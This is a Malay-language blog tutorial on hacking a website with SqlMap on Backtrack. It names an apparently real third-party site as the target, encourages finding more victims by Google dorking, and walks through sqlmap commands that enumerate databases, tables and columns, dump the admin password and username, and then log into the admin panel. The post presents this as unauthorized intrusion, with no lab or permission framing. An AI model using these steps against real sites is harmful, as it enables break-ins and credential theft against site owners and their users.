Assalamualaikum
Hari ni aku nak ajar macam mana nak guna SqlMap dalam Backtrack.Inilah sedikit cara bagaimana seseorang pengodam dapat access sesuatu website.Kebanyakan pengodam menggunakan Havij kerana havij adalah satu tool yang direka khas sama seperti SqlMap.Aku cadangkan korang menggunakan SqlMap kerana proses untuk mendapatkan username dan password admin lebih cepat berbanding Havij.Dalam tutorial ini,kita akan cuba dengan menggunakan site www.yboaofnc.com/event.php?id=35 atau site pilihan korang.Boleh dork sendiri di Google.Tanpa membuang masa.Jom kita mulakan tutorial ini.Pastikan korang sudah buka Backtrack :)
Buka pada "Application" >> "Backtrack" >> "Exploitation Tools" >> "Web Exploitation Tools" >> "SqlMap"
1) Taip python sqlmap.py -u www.yboaofnc.com/event.php?id=35 --dbs
2) Scan dan Tunggu
Akan dapatlah 3 database seperti ini:
[*] information_schema
[*] test
[*] yboa<--Yang dimahukan :D
3) Taip python sqlmap.py –u www.yboaofnc.com/event.php?id=35 -D yboa --tables
4) Scan dan Tunggu
5) Akan nampakla table yang terdapat dalam site tersebut
"So sekarang kita mahu melihat isi kandungan table allowed.So,korang buat seperti di bawah"
"Ingat.Setiap website mempunyai table yang lain2.So pilihlah yang berkaitan je dengan mengubah allowed kepada pilihan korang :D"
6) Taip python sqlmap.py –u www.yboaofnc.com/event.php?id=35 -D yboa –T allowed --columns
"Sekarang korang dah dapat 3 columns iaitu id,pwd & uname.So sekarang masanya untuk kita dapatkan pwd.Caranya boleh ikut step di bawah"
7) Taip python sqlmap.py –u www.yboaofnc.com/event.php?id=35 -D yboa -T allowed -C pwd --dump
8) Scan dan Tunggu
"Dah dapat dah passwordnya :D"
"So now.Masanya untuk korang dapatkan username dia pulak.Korang ikut step di bawah"
9)Taip python sqlmap.py -u www.yboaofnc.com/event.php?id=35 -T allowed -C uname --dump
"Hanya ubah nama depan C je :)"
10)Scan dan tunggu
11)Akhirnya dapat jugak username dan pass untuk login site tersebut.Apa yang kita perlu buat ialah mencari Admin Login dan Login site tersebut.





0 Comment:
Post a Comment
www.duni4-it.blogspot.com tidak bertanggungjawab di atas setiap komen yang diutarakan melalui blog ini.
-michaeljohn-